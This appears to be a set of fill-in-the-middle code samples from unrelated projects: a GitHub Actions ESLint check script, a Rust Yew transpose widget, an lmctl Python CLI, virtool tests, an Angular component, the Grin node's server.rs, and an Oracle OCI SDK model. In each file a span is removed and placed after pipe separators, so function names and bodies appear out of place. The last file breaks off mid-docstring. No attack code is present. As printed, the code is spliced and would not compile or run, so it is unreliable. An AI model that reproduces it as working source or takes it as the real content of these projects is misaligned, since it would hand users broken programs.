const { data } = await request(`https://api.github.com/repos/${ owner }/${ repo }/check-runs`, {
method: 'POST',
headers,
body: {
name: checkName,
head_sha: checkSha,
status: 'in_progress',
started_at: (new Date()).toISOString()
}
});
return data.id;
},
getChangedFiles = async targetBranch => {
const util = require('util'),
exec = util.promisify(require('child_process').exec),
{ stdout } = await exec(
`git diff origin/${targetBranch}... --name-only --diff-filter=d`
);
return stdout.trim().split('\n');
},
eslint = async () => {
const partialLinting = process.env.PARTIAL_LINTING; // falsy unless PARTIAL_LINTING is set in the workflow env
let files = ['.'];
if (partialLinting && event.pull_request) {
const branch = event.pull_request.base.ref;
files = await getChangedFiles(branch);
}
const eslint = require('eslint'),
cli = new eslint.CLIEngine(),
report = cli.executeOnFiles(files),
// fixableErrorCount, fixableWarningCount are available too
levels = ['notice', 'warning', 'failure'];
const annotations = report.results.reduce((annoList, result) => {
const path = result.filePath.substring(GITHUB_WORKSPACE.length + 1);
return annoList.concat(result.messages.map(m => {
const singleLine = m.line === m.endLine || m.endLine === undefined;
return {
path,
start_column: singleLine ? m.column : undefined,
end_column: singleLine ? m.endColumn || m.column : undefined,
start_line: m.line,
end_line: m.endLine || m.line,
annotation_level: levels[m.severity],
// title: `${ path }#L${ m.line }`,
// raw_details: 'Nothing much',
message: `${ m.ruleId }: ${ m.message }`
};
}));
}, []),
{
errorCount, warningCount
} = report;
return {
annotations,
errorCount,
warningCount
};
},
updateCheck = async (id, opts = {}) =>
await request(`https://api.github.com/repos/${ owner }/${ repo }/check-runs/${ id }`, {
method: 'PATCH',
headers,
body: {
name: checkName,
head_sha: checkSha,
...opts
}
}),
updateChecks = async (id, {
errorCount, warningCount, annotations
}) => {
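// The GitHub Checks API accepts at most 50 annotations per request,
// so the annotations are sent in batches of that size.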
const chunkSize = 50,
chunksLength = Math.ceil(annotations.length / chunkSize);
await Promise.all(new Array(chunksLength).fill().map((_, i) => updateCheck(id, {
status: 'in_progress',
output: {
title: checkName,
summary: `${ errorCount } error(s), ${ warningCount } warning(s) found`, | })));
await updateCheck(id, {
status: 'completed',
completed_at: (new Date()).toISOString(),
conclusion: errorCount > 0 ? 'failure' : warningCount > 0 && 'neutral' || 'success',
output: {
title: checkName,
summary: `${ errorCount } error(s), ${ warningCount } warning(s) found`
}
});
},
run = async () => {
const id = await createCheck();
try {
await updateChecks(id, await eslint());
} catch (err) {
await updateCheck(id, {
conclusion: 'failure',
status: 'completed',
completed_at: (new Date()).toISOString(),
output: {
title: checkName,
summary: `Error while performing the check: ${err.message}`
}
});
exitWithError(err);
}
};
run().catch(exitWithError); | annotations: annotations.slice(i * chunkSize, (i + 1) * chunkSize)
} |
transpose_tool.rs | use log::error;
use log::info;
use yew::prelude::*;
#[derive(Properties, PartialEq, Clone)]
pub struct TransposeToolProps {
pub transpose_semitone: isize,
pub show_input_field: bool,
pub on_click_up: Callback<()>,
pub on_click_down: Callback<()>,
pub on_set: Callback<isize>,
}
pub enum Msg {
InputChange(ChangeData),
}
pub struct TransposeTool {
/// State from the parent
props: TransposeToolProps,
/// Utility object
link: ComponentLink<Self>,
}
impl Component for TransposeTool {
type Message = Msg;
type Properties = TransposeToolProps;
fn create(props: Self::Properties, link: ComponentLink<Self>) -> Self {
Self { link, props }
}
fn update(&mut self, msg: Self::Message) -> ShouldRender {
match msg {
Msg::InputChange(ChangeData::Value(v)) => {
info!("{:?}", v);
match v.parse::<isize>() {
Ok(v) => {
self.props.on_set.emit(v);
}
Err(_) => {
error!("Invalid change data {:?}", v);
}
};
}
Msg::InputChange(change_data) => error!("Invalid change data {:?}", change_data),
};
true
}
fn change(&mut self, props: Self::Properties) -> ShouldRender {
if self.props != props {
self.props = props;
true
} else {
false
}
}
fn | (&self) -> Html {
let transpose_semitone = self.props.transpose_semitone;
let transpose_up = self.props.on_click_up.reform(|_| ());
let transpose_down = self.props.on_click_down.reform(|_| ());
let show_input_field = self.props.show_input_field;
let number_output = if show_input_field {
let onchange = self.link.callback(Msg::InputChange);
html! {<input type="number" min="-11" max="11" onchange=onchange value=transpose_semitone.to_string()/>}
} else {
html! {<span class="value">{transpose_semitone}</span>}
};
let disable_down = transpose_semitone < -11;
let disable_up = transpose_semitone > 11;
let inner = html! {
<>
<span class="icon">{"♬"}</span>
<button class="discreet" disabled=disable_down onclick=transpose_down><i class="im im-angle-left"></i></button>
{number_output}
<button class="discreet" disabled=disable_up onclick=transpose_up><i class="im im-angle-right"></i></button>
<span class="sr-only">{"Transpose song"}</span>
</>
};
(if show_input_field {
html! {
<div class="transpose-tool">
<label title="Transpose song">
{inner}
</label>
</div>
}
} else {
html! {
<div class="transpose-tool">
<div title="Transpose song">
{inner}
</div>
</div>
}
}) as Html
}
}
| view |
behaviour_projects.py | import click
from typing import Dict
from lmctl.client import TNCOClient, TNCOClientHttpError
from lmctl.cli.arguments import common_output_format_handler
from lmctl.cli.format import Table, Column
from .tnco_target import TNCOTarget, LmGet, LmCreate, LmUpdate, LmDelete, LmGen
class ProjectTable(Table):
columns = [
Column('name', header='Name'),
Column('description', header='Description')
]
output_formats = common_output_format_handler(table=ProjectTable())
class Projects(TNCOTarget):
name = 'behaviourproject'
plural = 'behaviourprojects'
display_name = 'Behaviour Project'
@LmGen()
def genfile(self, ctx: click.Context, name: str):
return {
'name': f'assembly::{name}::1.0',
}
@LmGet(output_formats=output_formats, help=f'''\
Get all {display_name}s or get one by name\
\n\nUse NAME argument to get one by name\
\n\nOmit NAME argument to get all projects\
\n\nNote: all Assembly descriptors have a Behaviour Project associated with them so can be found using their name e.g. assembly::example::1.0''')
@click.argument('name', required=False)
def get(self, tnco_client: TNCOClient, ctx: click.Context, name: str = None):
api = tnco_client.behaviour_projects
if name is not None:
return api.get(name)
else:
return api.all()
@LmCreate()
def create(self, tnco_client: TNCOClient, ctx: click.Context, file_content: Dict = None, set_values: Dict = None):
api = tnco_client.behaviour_projects
if file_content is not None:
|
else:
project = set_values
result = api.create(project)
return result.get('name')
@LmUpdate()
@click.argument('name', required=False)
def update(self, tnco_client: TNCOClient, ctx: click.Context, file_content: Dict = None, name: str = None, set_values: Dict = None):
api = tnco_client.behaviour_projects
if file_content is not None:
if name is not None:
raise click.BadArgumentUsage(message='Do not use "NAME" argument when using "-f, --file" option', ctx=ctx)
project = file_content
else:
if name is None:
raise click.BadArgumentUsage(message='Must set "NAME" argument when no "-f, --file" option specified', ctx=ctx)
project = api.get(name)
project.update(set_values)
result = api.update(project)
return project.get('name')
@LmDelete()
@click.argument('name', required=False)
def delete(self, tnco_client: TNCOClient, ctx: click.Context, file_content: Dict = None, name: str = None, ignore_missing: bool = None):
api = tnco_client.behaviour_projects
if file_content is not None:
if name is not None:
raise click.BadArgumentUsage(message='Do not use "NAME" argument when using "-f, --file" option', ctx=ctx)
project = file_content
project_id = project.get('id', project.get('name', None))
if project_id is None:
raise click.BadArgumentUsage(message='Object from file does not contain an "name" (or "id") attribute', ctx=ctx)
else:
if name is None:
raise click.BadArgumentUsage(message='Must set "NAME" argument when no "-f, --file" option specified', ctx=ctx)
project_id = name
try:
result = api.delete(project_id)
except TNCOClientHttpError as e:
if e.status_code == 404:
# Not found
if ignore_missing:
ctl = self._get_controller()
ctl.io.print(f'No {self.display_name} found with name (ID) {project_id} (ignoring)')
return
raise
return project_id | if set_values is not None and len(set_values) > 0:
raise click.BadArgumentUsage(message='Do not use "--set" option when using "-f, --file" option', ctx=ctx)
project = file_content |
test_utils.py | import os
import pytest
from virtool.subtractions.utils import (
check_subtraction_file_type,
get_subtraction_files,
join_subtraction_path,
rename_bowtie_files,
)
def test_join_subtraction_path(tmp_path, config):
assert join_subtraction_path(config, "bar") == tmp_path / "subtractions" / "bar"
async def | (snapshot, pg, test_subtraction_files):
assert await get_subtraction_files(pg, "foo") == snapshot
def test_rename_bowtie_files(tmp_path):
test_dir = tmp_path / "subtractions"
test_dir.mkdir()
test_dir.joinpath("reference.1.bt2").write_text("Bowtie2 file")
test_dir.joinpath("reference.2.bt2").write_text("Bowtie2 file")
test_dir.joinpath("reference.3.bt2").write_text("Bowtie2 file")
rename_bowtie_files(test_dir)
assert set(os.listdir(test_dir)) == {
"subtraction.1.bt2",
"subtraction.2.bt2",
"subtraction.3.bt2",
}
@pytest.mark.parametrize("file_type", ["fasta", "bowtie2"])
def test_check_subtraction_file_type(file_type):
if file_type == "fasta":
result = check_subtraction_file_type("subtraction.fa.gz")
assert result == "fasta"
if file_type == "bowtie2":
result = check_subtraction_file_type("subtraction.1.bt2")
assert result == "bowtie2"
| test_get_subtraction_files |
app.component.ts | import { Component, VERSION } from "@angular/core";
import "./string.extensions";
import { Test } from "./test";
@Component({
selector: "my-app",
templateUrl: "./app.component.html",
styleUrls: ["./app.component.css"]
})
export class AppComponent {
title = `Angular ${VERSION.major} service using in extension method `;
serviceMessage = "";
| constructor() {
this.serviceMessage = Test.serviceMessage();
}
} | |
server.rs | // Copyright 2018 The Grin Developers
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//! Grin server implementation, glues the different parts of the system (mostly
//! the peer-to-peer server, the blockchain and the transaction pool) and acts
//! as a facade.
use std::fs;
use std::fs::File;
use std::io::prelude::*;
use std::path::Path;
use std::sync::Arc;
use std::{thread, time};
use fs2::FileExt;
use crate::api;
use crate::api::TLSConfig;
use crate::chain;
use crate::common::adapters::{
ChainToPoolAndNetAdapter, NetToChainAdapter, PoolToChainAdapter, PoolToNetAdapter,
};
use crate::common::stats::{DiffBlock, DiffStats, PeerStats, ServerStateInfo, ServerStats};
use crate::common::types::{Error, ServerConfig, StratumServerConfig, SyncState, SyncStatus};
use crate::core::core::hash::{Hashed, ZERO_HASH};
use crate::core::core::verifier_cache::{LruVerifierCache, VerifierCache};
use crate::core::{consensus, genesis, global, pow};
use crate::grin::{dandelion_monitor, seed, sync};
use crate::mining::stratumserver;
use crate::mining::test_miner::Miner;
use crate::p2p;
use crate::p2p::types::PeerAddr;
use crate::pool;
use crate::store;
use crate::util::file::get_first_line;
use crate::util::{Mutex, RwLock, StopState};
/// Grin server holding internal structures.
pub struct Server {
/// server config
pub config: ServerConfig,
/// handle to our network server
pub p2p: Arc<p2p::Server>,
/// data store access
pub chain: Arc<chain::Chain>,
/// in-memory transaction pool
tx_pool: Arc<RwLock<pool::TransactionPool>>,
/// Shared cache for verification results when
/// verifying rangeproof and kernel signatures.
verifier_cache: Arc<RwLock<dyn VerifierCache>>,
/// Whether we're currently syncing
sync_state: Arc<SyncState>,
/// To be passed around to collect stats and info
state_info: ServerStateInfo,
/// Stop flag
pub stop_state: Arc<Mutex<StopState>>,
/// Maintain a lock_file so we do not run multiple Grin nodes from same dir.
lock_file: Arc<File>,
}
impl Server {
/// Instantiates and starts a new server. Optionally takes a callback
/// for the server to send an ARC copy of itself, to allow another process
/// to poll info about the server status
pub fn start<F>(config: ServerConfig, mut info_callback: F) -> Result<(), Error>
where
F: FnMut(Arc<Server>),
{
let mining_config = config.stratum_mining_config.clone();
let enable_test_miner = config.run_test_miner;
let test_miner_wallet_url = config.test_miner_wallet_url.clone();
let serv = Arc::new(Server::new(config)?);
if let Some(c) = mining_config {
let enable_stratum_server = c.enable_stratum_server;
if let Some(s) = enable_stratum_server {
if s {
{
let mut stratum_stats = serv.state_info.stratum_stats.write();
stratum_stats.is_enabled = true;
}
serv.start_stratum_server(c.clone());
}
}
}
if let Some(s) = enable_test_miner {
if s {
serv.start_test_miner(test_miner_wallet_url, serv.stop_state.clone());
}
}
info_callback(serv.clone());
loop {
thread::sleep(time::Duration::from_secs(1));
if serv.stop_state.lock().is_stopped() {
return Ok(());
}
}
}
// Exclusive (advisory) lock_file to ensure we do not run multiple
// instance of grin server from the same dir.
// This uses fs2 and should be safe cross-platform unless somebody abuses the file itself.
fn one_grin_at_a_time(config: &ServerConfig) -> Result<Arc<File>, Error> |
/// Instantiates a new server associated with the provided future reactor.
pub fn new(config: ServerConfig) -> Result<Server, Error> {
// Obtain our lock_file or fail immediately with an error.
let lock_file = Server::one_grin_at_a_time(&config)?;
// Defaults to None (optional) in config file.
// This translates to false here.
let archive_mode = match config.archive_mode {
None => false,
Some(b) => b,
};
let stop_state = Arc::new(Mutex::new(StopState::new()));
// Shared cache for verification results.
// We cache rangeproof verification and kernel signature verification.
let verifier_cache = Arc::new(RwLock::new(LruVerifierCache::new()));
let pool_adapter = Arc::new(PoolToChainAdapter::new());
let pool_net_adapter = Arc::new(PoolToNetAdapter::new());
let tx_pool = Arc::new(RwLock::new(pool::TransactionPool::new(
config.pool_config.clone(),
pool_adapter.clone(),
verifier_cache.clone(),
pool_net_adapter.clone(),
)));
let sync_state = Arc::new(SyncState::new());
let chain_adapter = Arc::new(ChainToPoolAndNetAdapter::new(tx_pool.clone()));
let genesis = match config.chain_type {
global::ChainTypes::AutomatedTesting => genesis::genesis_dev(),
global::ChainTypes::UserTesting => genesis::genesis_dev(),
global::ChainTypes::Floonet => genesis::genesis_floo(),
global::ChainTypes::Mainnet => genesis::genesis_main(),
};
info!("Starting server, genesis block: {}", genesis.hash());
let db_env = Arc::new(store::new_env(config.db_root.clone()));
let shared_chain = Arc::new(chain::Chain::init(
config.db_root.clone(),
db_env,
chain_adapter.clone(),
genesis.clone(),
pow::verify_size,
verifier_cache.clone(),
archive_mode,
stop_state.clone(),
)?);
pool_adapter.set_chain(shared_chain.clone());
let net_adapter = Arc::new(NetToChainAdapter::new(
sync_state.clone(),
shared_chain.clone(),
tx_pool.clone(),
verifier_cache.clone(),
config.clone(),
));
let peer_db_env = Arc::new(store::new_named_env(
config.db_root.clone(),
"peer".into(),
config.p2p_config.peer_max_count,
));
let p2p_server = Arc::new(p2p::Server::new(
peer_db_env,
config.p2p_config.capabilities,
config.p2p_config.clone(),
net_adapter.clone(),
genesis.hash(),
stop_state.clone(),
)?);
chain_adapter.init(p2p_server.peers.clone());
pool_net_adapter.init(p2p_server.peers.clone());
net_adapter.init(p2p_server.peers.clone());
if config.p2p_config.seeding_type != p2p::Seeding::Programmatic {
let seeder = match config.p2p_config.seeding_type {
p2p::Seeding::None => {
warn!("No seed configured, will stay solo until connected to");
seed::predefined_seeds(vec![])
}
p2p::Seeding::List => match &config.p2p_config.seeds {
Some(seeds) => seed::predefined_seeds(seeds.clone()),
None => {
return Err(Error::Configuration(
"Seeds must be configured for seeding type List".to_owned(),
));
}
},
p2p::Seeding::DNSSeed => seed::dns_seeds(),
_ => unreachable!(),
};
seed::connect_and_monitor(
p2p_server.clone(),
config.p2p_config.capabilities,
config.dandelion_config.clone(),
seeder,
config.p2p_config.peers_preferred.clone(),
stop_state.clone(),
);
}
// Defaults to None (optional) in config file.
// This translates to false here so we do not skip by default.
let skip_sync_wait = config.skip_sync_wait.unwrap_or(false);
sync_state.update(SyncStatus::AwaitingPeers(!skip_sync_wait));
sync::run_sync(
sync_state.clone(),
p2p_server.peers.clone(),
shared_chain.clone(),
stop_state.clone(),
);
let p2p_inner = p2p_server.clone();
let _ = thread::Builder::new()
.name("p2p-server".to_string())
.spawn(move || p2p_inner.listen());
info!("Starting rest apis at: {}", &config.api_http_addr);
let api_secret = get_first_line(config.api_secret_path.clone());
let tls_conf = match config.tls_certificate_file.clone() {
None => None,
Some(file) => {
let key = match config.tls_certificate_key.clone() {
Some(k) => k,
None => {
let msg = format!("Private key for certificate is not set");
return Err(Error::ArgumentError(msg));
}
};
Some(TLSConfig::new(file, key))
}
};
api::start_rest_apis(
config.api_http_addr.clone(),
shared_chain.clone(),
tx_pool.clone(),
p2p_server.peers.clone(),
api_secret,
tls_conf,
);
info!("Starting dandelion monitor: {}", &config.api_http_addr);
dandelion_monitor::monitor_transactions(
config.dandelion_config.clone(),
tx_pool.clone(),
verifier_cache.clone(),
stop_state.clone(),
);
warn!("Grin server started.");
Ok(Server {
config,
p2p: p2p_server,
chain: shared_chain,
tx_pool,
verifier_cache,
sync_state,
state_info: ServerStateInfo {
..Default::default()
},
stop_state,
lock_file,
})
}
/// Asks the server to connect to a peer at the provided network address.
pub fn connect_peer(&self, addr: PeerAddr) -> Result<(), Error> {
self.p2p.connect(addr)?;
Ok(())
}
/// Ping all peers, mostly useful for tests to have connected peers share
/// their heights
pub fn ping_peers(&self) -> Result<(), Error> {
let head = self.chain.head()?;
self.p2p.peers.check_all(head.total_difficulty, head.height);
Ok(())
}
/// Number of peers
pub fn peer_count(&self) -> u32 {
self.p2p.peers.peer_count()
}
/// Start a minimal "stratum" mining service on a separate thread
pub fn start_stratum_server(&self, config: StratumServerConfig) {
let edge_bits = global::min_edge_bits();
let proof_size = global::proofsize();
let sync_state = self.sync_state.clone();
let mut stratum_server = stratumserver::StratumServer::new(
config.clone(),
self.chain.clone(),
self.tx_pool.clone(),
self.verifier_cache.clone(),
);
let stratum_stats = self.state_info.stratum_stats.clone();
let _ = thread::Builder::new()
.name("stratum_server".to_string())
.spawn(move || {
stratum_server.run_loop(stratum_stats, edge_bits as u32, proof_size, sync_state);
});
}
/// Start mining for blocks internally on a separate thread. Relies on
/// internal miner, and should only be used for automated testing. Burns
/// reward if wallet_listener_url is 'None'
pub fn start_test_miner(
&self,
wallet_listener_url: Option<String>,
stop_state: Arc<Mutex<StopState>>,
) {
info!("start_test_miner - start",);
let sync_state = self.sync_state.clone();
let config_wallet_url = match wallet_listener_url.clone() {
Some(u) => u,
None => String::from("http://127.0.0.1:13415"),
};
let config = StratumServerConfig {
attempt_time_per_block: 60,
burn_reward: false,
enable_stratum_server: None,
stratum_server_addr: None,
wallet_listener_url: config_wallet_url,
minimum_share_difficulty: 1,
};
let mut miner = Miner::new(
config.clone(),
self.chain.clone(),
self.tx_pool.clone(),
self.verifier_cache.clone(),
stop_state,
);
miner.set_debug_output_id(format!("Port {}", self.config.p2p_config.port));
let _ = thread::Builder::new()
.name("test_miner".to_string())
.spawn(move || {
// TODO push this down in the run loop so miner gets paused anytime we
// decide to sync again
let secs_5 = time::Duration::from_secs(5);
while sync_state.is_syncing() {
thread::sleep(secs_5);
}
miner.run_loop(wallet_listener_url);
});
}
/// The chain head
pub fn head(&self) -> Result<chain::Tip, Error> {
self.chain.head().map_err(|e| e.into())
}
/// The head of the block header chain
pub fn header_head(&self) -> Result<chain::Tip, Error> {
self.chain.header_head().map_err(|e| e.into())
}
/// Returns a set of stats about this server. This and the ServerStats
/// structure
/// can be updated over time to include any information needed by tests or
/// other
/// consumers
pub fn get_server_stats(&self) -> Result<ServerStats, Error> {
let stratum_stats = self.state_info.stratum_stats.read().clone();
// Fill out stats on our current difficulty calculation
// TODO: check the overhead of calculating this again isn't too much
// could return it from next_difficulty, but would rather keep consensus
// code clean. This may be handy for testing but not really needed
// for release
let diff_stats = {
let last_blocks: Vec<consensus::HeaderInfo> =
global::difficulty_data_to_vector(self.chain.difficulty_iter()?)
.into_iter()
.collect();
let tip_height = self.head()?.height as i64;
let mut height = tip_height as i64 - last_blocks.len() as i64 + 1;
let txhashset = self.chain.txhashset();
let txhashset = txhashset.read();
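// Walk consecutive header pairs: each DiffBlock reports its duration
// as the timestamp difference between neighbouring headers.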
let diff_entries: Vec<DiffBlock> = last_blocks
.windows(2)
.map(|pair| {
let prev = &pair[0];
let next = &pair[1];
height += 1;
// Use header hash if real header.
// Default to "zero" hash if synthetic header_info.
let hash = if height >= 0 {
if let Ok(header) = txhashset.get_header_by_height(height as u64) {
header.hash()
} else {
ZERO_HASH
}
} else {
ZERO_HASH
};
DiffBlock {
block_height: height,
block_hash: hash,
difficulty: next.difficulty.to_num(),
time: next.timestamp,
duration: next.timestamp - prev.timestamp,
secondary_scaling: next.secondary_scaling,
is_secondary: next.is_secondary,
}
})
.collect();
let block_time_sum = diff_entries.iter().fold(0, |sum, t| sum + t.duration);
let block_diff_sum = diff_entries.iter().fold(0, |sum, d| sum + d.difficulty);
DiffStats {
height: height as u64,
last_blocks: diff_entries,
average_block_time: block_time_sum / (consensus::DIFFICULTY_ADJUST_WINDOW - 1),
average_difficulty: block_diff_sum / (consensus::DIFFICULTY_ADJUST_WINDOW - 1),
window_size: consensus::DIFFICULTY_ADJUST_WINDOW,
}
};
let peer_stats = self
.p2p
.peers
.connected_peers()
.into_iter()
.map(|p| PeerStats::from_peer(&p))
.collect();
Ok(ServerStats {
peer_count: self.peer_count(),
head: self.head()?,
header_head: self.header_head()?,
sync_status: self.sync_state.status(),
stratum_stats: stratum_stats,
peer_stats: peer_stats,
diff_stats: diff_stats,
})
}
/// Stop the server.
pub fn stop(&self) {
self.p2p.stop();
self.stop_state.lock().stop();
let _ = self.lock_file.unlock();
}
/// Pause the p2p server.
pub fn pause(&self) {
self.stop_state.lock().pause();
thread::sleep(time::Duration::from_secs(1));
self.p2p.pause();
}
/// Resume p2p server.
/// TODO - We appear not to resume the p2p server (peer connections) here?
pub fn resume(&self) {
self.stop_state.lock().resume();
}
/// Stops the test miner without stopping the p2p layer
pub fn stop_test_miner(&self, stop: Arc<Mutex<StopState>>) {
stop.lock().stop();
info!("stop_test_miner - stop",);
}
}
| {
let path = Path::new(&config.db_root);
fs::create_dir_all(path.clone())?;
let path = path.join("grin.lock");
let lock_file = fs::OpenOptions::new()
.read(true)
.write(true)
.create(true)
.open(&path)?;
lock_file.try_lock_exclusive().map_err(|e| {
let mut stderr = std::io::stderr();
writeln!(
&mut stderr,
"Failed to lock {:?} (grin server already running?)",
path
)
.expect("Could not write to stderr");
e
})?;
Ok(Arc::new(lock_file))
} |
launch_db_system_from_db_system_details.py | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .launch_db_system_base import LaunchDbSystemBase
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class LaunchDbSystemFromDbSystemDetails(LaunchDbSystemBase):
"""
Used for creating a new database system by cloning an existing DB system.
"""
#: A constant which can be used with the license_model property of a LaunchDbSystemFromDbSystemDetails.
#: This constant has a value of "LICENSE_INCLUDED"
LICENSE_MODEL_LICENSE_INCLUDED = "LICENSE_INCLUDED"
#: A constant which can be used with the license_model property of a LaunchDbSystemFromDbSystemDetails.
#: This constant has a value of "BRING_YOUR_OWN_LICENSE"
LICENSE_MODEL_BRING_YOUR_OWN_LICENSE = "BRING_YOUR_OWN_LICENSE"
def __init__(self, **kwargs):
"""
Initializes a new LaunchDbSystemFromDbSystemDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.database.models.LaunchDbSystemFromDbSystemDetails.source` attribute
of this class is ``DB_SYSTEM`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this LaunchDbSystemFromDbSystemDetails.
:type compartment_id: str
:param fault_domains:
The value to assign to the fault_domains property of this LaunchDbSystemFromDbSystemDetails.
:type fault_domains: list[str]
:param display_name:
The value to assign to the display_name property of this LaunchDbSystemFromDbSystemDetails.
:type display_name: str
:param availability_domain:
The value to assign to the availability_domain property of this LaunchDbSystemFromDbSystemDetails.
:type availability_domain: str
:param subnet_id:
The value to assign to the subnet_id property of this LaunchDbSystemFromDbSystemDetails.
:type subnet_id: str
:param backup_subnet_id:
The value to assign to the backup_subnet_id property of this LaunchDbSystemFromDbSystemDetails.
:type backup_subnet_id: str
:param nsg_ids:
The value to assign to the nsg_ids property of this LaunchDbSystemFromDbSystemDetails.
:type nsg_ids: list[str]
:param backup_network_nsg_ids:
The value to assign to the backup_network_nsg_ids property of this LaunchDbSystemFromDbSystemDetails.
:type backup_network_nsg_ids: list[str]
:param shape:
The value to assign to the shape property of this LaunchDbSystemFromDbSystemDetails.
:type shape: str
:param time_zone:
The value to assign to the time_zone property of this LaunchDbSystemFromDbSystemDetails.
:type time_zone: str
:param db_system_options:
The value to assign to the db_system_options property of this LaunchDbSystemFromDbSystemDetails.
:type db_system_options: oci.database.models.DbSystemOptions
:param sparse_diskgroup:
The value to assign to the sparse_diskgroup property of this LaunchDbSystemFromDbSystemDetails.
:type sparse_diskgroup: bool
:param ssh_public_keys:
The value to assign to the ssh_public_keys property of this LaunchDbSystemFromDbSystemDetails.
:type ssh_public_keys: list[str]
:param hostname:
The value to assign to the hostname property of this LaunchDbSystemFromDbSystemDetails.
:type hostname: str
:param domain:
The value to assign to the domain property of this LaunchDbSystemFromDbSystemDetails.
:type domain: str
:param cpu_core_count:
The value to assign to the cpu_core_count property of this LaunchDbSystemFromDbSystemDetails.
:type cpu_core_count: int
:param cluster_name:
The value to assign to the cluster_name property of this LaunchDbSystemFromDbSystemDetails.
:type cluster_name: str
:param data_storage_percentage:
The value to assign to the data_storage_percentage property of this LaunchDbSystemFromDbSystemDetails.
:type data_storage_percentage: int
:param initial_data_storage_size_in_gb:
The value to assign to the initial_data_storage_size_in_gb property of this LaunchDbSystemFromDbSystemDetails.
:type initial_data_storage_size_in_gb: int
:param kms_key_id:
The value to assign to the kms_key_id property of this LaunchDbSystemFromDbSystemDetails.
:type kms_key_id: str
:param kms_key_version_id:
The value to assign to the kms_key_version_id property of this LaunchDbSystemFromDbSystemDetails.
:type kms_key_version_id: str
:param node_count:
The value to assign to the node_count property of this LaunchDbSystemFromDbSystemDetails.
:type node_count: int
:param freeform_tags:
The value to assign to the freeform_tags property of this LaunchDbSystemFromDbSystemDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this LaunchDbSystemFromDbSystemDetails.
:type defined_tags: dict(str, dict(str, object))
:param source:
The value to assign to the source property of this LaunchDbSystemFromDbSystemDetails.
Allowed values for this property are: "NONE", "DB_BACKUP", "DATABASE", "DB_SYSTEM"
:type source: str
:param private_ip:
The value to assign to the private_ip property of this LaunchDbSystemFromDbSystemDetails.
:type private_ip: str
:param source_db_system_id:
The value to assign to the source_db_system_id property of this LaunchDbSystemFromDbSystemDetails.
:type source_db_system_id: str
:param db_home:
The value to assign to the db_home property of this LaunchDbSystemFromDbSystemDetails.
:type db_home: oci.database.models.CreateDbHomeFromDbSystemDetails
:param license_model:
The value to assign to the license_model property of this LaunchDbSystemFromDbSystemDetails.
Allowed values for this property are: "LICENSE_INCLUDED", "BRING_YOUR_OWN_LICENSE"
:type license_model: str
"""
self.swagger_types = {
'compartment_id': 'str',
'fault_domains': 'list[str]',
'display_name': 'str',
'availability_domain': 'str',
'subnet_id': 'str',
'backup_subnet_id': 'str',
'nsg_ids': 'list[str]',
'backup_network_nsg_ids': 'list[str]',
'shape': 'str',
'time_zone': 'str',
'db_system_options': 'DbSystemOptions',
'sparse_diskgroup': 'bool',
'ssh_public_keys': 'list[str]',
'hostname': 'str',
'domain': 'str',
'cpu_core_count': 'int',
'cluster_name': 'str',
'data_storage_percentage': 'int',
'initial_data_storage_size_in_gb': 'int',
'kms_key_id': 'str',
'kms_key_version_id': 'str',
'node_count': 'int',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'source': 'str',
'private_ip': 'str',
'source_db_system_id': 'str',
'db_home': 'CreateDbHomeFromDbSystemDetails',
'license_model': 'str'
}
self.attribute_map = {
'compartment_id': 'compartmentId',
'fault_domains': 'faultDomains',
'display_name': 'displayName',
'availability_domain': 'availabilityDomain',
'subnet_id': 'subnetId',
'backup_subnet_id': 'backupSubnetId',
'nsg_ids': 'nsgIds',
'backup_network_nsg_ids': 'backupNetworkNsgIds',
'shape': 'shape',
'time_zone': 'timeZone',
'db_system_options': 'dbSystemOptions',
'sparse_diskgroup': 'sparseDiskgroup',
'ssh_public_keys': 'sshPublicKeys',
'hostname': 'hostname',
'domain': 'domain',
'cpu_core_count': 'cpuCoreCount',
'cluster_name': 'clusterName',
'data_storage_percentage': 'dataStoragePercentage',
'initial_data_storage_size_in_gb': 'initialDataStorageSizeInGB',
'kms_key_id': 'kmsKeyId',
'kms_key_version_id': 'kmsKeyVersionId',
'node_count': 'nodeCount',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'source': 'source',
'private_ip': 'privateIp',
'source_db_system_id': 'sourceDbSystemId',
'db_home': 'dbHome',
'license_model': 'licenseModel'
}
self._compartment_id = None
self._fault_domains = None
self._display_name = None
self._availability_domain = None
self._subnet_id = None
self._backup_subnet_id = None
self._nsg_ids = None
self._backup_network_nsg_ids = None
self._shape = None
self._time_zone = None
self._db_system_options = None
self._sparse_diskgroup = None
self._ssh_public_keys = None
self._hostname = None
self._domain = None
self._cpu_core_count = None
self._cluster_name = None
self._data_storage_percentage = None
self._initial_data_storage_size_in_gb = None
self._kms_key_id = None
self._kms_key_version_id = None
self._node_count = None
self._freeform_tags = None | self._private_ip = None
self._source_db_system_id = None
self._db_home = None
self._license_model = None
self._source = 'DB_SYSTEM'
@property
def source_db_system_id(self):
"""
**[Required]** Gets the source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
The `OCID`__ of the DB system.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
:rtype: str
"""
return self._source_db_system_id
@source_db_system_id.setter
def source_db_system_id(self, source_db_system_id):
"""
Sets the source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
The `OCID`__ of the DB system.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
